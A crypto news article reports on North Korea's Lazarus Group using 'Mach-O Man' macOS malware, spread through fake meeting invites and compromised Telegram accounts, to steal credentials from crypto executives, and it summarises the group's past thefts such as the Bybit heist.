Skip to content

North Korea’s Lazarus uses ‘Mach-O Man’ malware to infiltrate crypto firms

North Korea’s Lazarus Group targets crypto execs with new macOS malware
SHARE THIS ARTICLE
Twitter
LinkedIn
Telegram
Whatsapp
Written by
Written by
Nausheen Thusoo
Reviewed by
Reviewed by
Raghav Chopra
Apr. 22, 2026

North Korea’s Lazarus group has found yet another method to infiltrate crypto firms, however this time, the method remains slightly tricky. 

The hackers are deploying “Mach-O Man” macOS malware and phoney meeting invites to take over cryptocurrency executives and finance nine-figure DeFi raids, according to media reports from Wednesday.

Reports say that the attackers are spreading the malware through hacked Telegram accounts and fake meeting invites sent to executives at valuable companies. At first, these messages look real, often posing as routine business calls or support sessions, which makes the victim less likely to be on guard. Once a target responds, they are tricked into running hidden commands on their Mac computers.

This particular campaign of malware, known as “Mach-O Man,” steals private data from computers such as login information for crypto wallets, passwords, and even information from the victim organization.

It becomes even more dangerous because of its subtle nature, as the malware removes all traces of itself after finishing its objective.

The new method comes as the wider crypto sector grapples with a rise in crypto hacks and scams, with the Lazarus group behind a majority of them. According to the latest Chainalysis report, the group stole $6.75 billion in cryptocurrency since 2016.

Description of the tool

Threat intelligence firm SOC Prime says the “Mach-O Man” malware campaign has been linked to Lazarus Group, specifically its Famous Chollima unit, which is known for targeting crypto and financial companies.

The attackers are reportedly spreading the malware through compromised Telegram accounts and fake meeting invites that are sent to executives in high-value organisations. These messages look legitimate at first, often posing as routine business calls or support sessions, which helps lower the victim’s guard.

Once a target engages, they are tricked into running hidden commands on their Mac computers. According to CoinDesk, the malware is built using multiple macOS components that quietly scan the device, stay active in the background, and steal sensitive data like login details and browser information. That data is then sent back to the attackers through Telegram channels.

Researchers at Google Cloud Mandiant say they have seen similar tactics before. In earlier attacks, hackers used fake Zoom calls, compromised messaging accounts, and even AI-generated videos to make the scams more believable. Victims were then pushed into copying and running commands that secretly installed malware.

In simple terms, experts say the group is not breaking into systems directly anymore. Instead, they are tricking people into doing it themselves by creating convincing fake meetings and messages that look completely normal.

North Korea linked crypto hacking sees rise 

North Korea’s Lazarus Group has become one of the most active cybercrime groups in the world, with authorities linking it to a series of major cryptocurrency thefts over the past few years.

The most significant of these attacks occurred in February 2025, when the group supposedly managed to steal about $1.5 billion from the exchange known as Bybit. This attack became the largest ever crypto heist in history and showed just how massive and well-organized such operations could become.

According to global experts, this problem goes beyond random attacks. Former members of the UN working group suggested in their 2024 report that at least 40 percent of the funds used by North Korea for their weapon development programs were received through cybercrimes, including ransomware and attacks on cryptocurrency exchanges and financial institutions.

Moreover, according to the U.S. Department of the Treasury, North Korean hackers managed to steal more than $3 billion during their three-year campaign of attacking banks, exchanges, and other digital asset companies.

Markets are already essentially pricing in another $100 million+ exploit this year, highlighting how state-linked attackers like Lazarus have become systemic to crypto risk, with DeFi already experiencing what research sites have dubbed its worst month on record for attacks.

The Coin Headlines strives to bring trust into crypto media. At a time when every soundbite and headline can move the markets from red to green and vice-versa, The Coin Headlines promises to bring verified, credible and timely news and analysis from the world of crypto, blockchain, Web3, tech and markets. Founded in 2026, The Coin Headlines is based in the UAE with a team of experienced journalists and editors covering breaking news and updates from around the world.

From covering the biggest events to interviewing some of the most popular KOLs in the industry, The Coin Headlines keeps you informed of the latest trends and insights.

At The Coin Headlines our focus is clear: Real-time news updates, market movements, whale transfers, macroeconomic trends, tech and AI and geopolitical breaking news. The news we report goes through a strict editorial audit before its published to ensure the readers only get verified and credible information. We realize the world of crypto is dynamic, volatile, and many times, confusing. At The Coin Headlines we break down these complex issues into simple articles which cater to not just the experienced trader but also the student and first-time investor who wants to understand the space before committing to it.

Popular Topics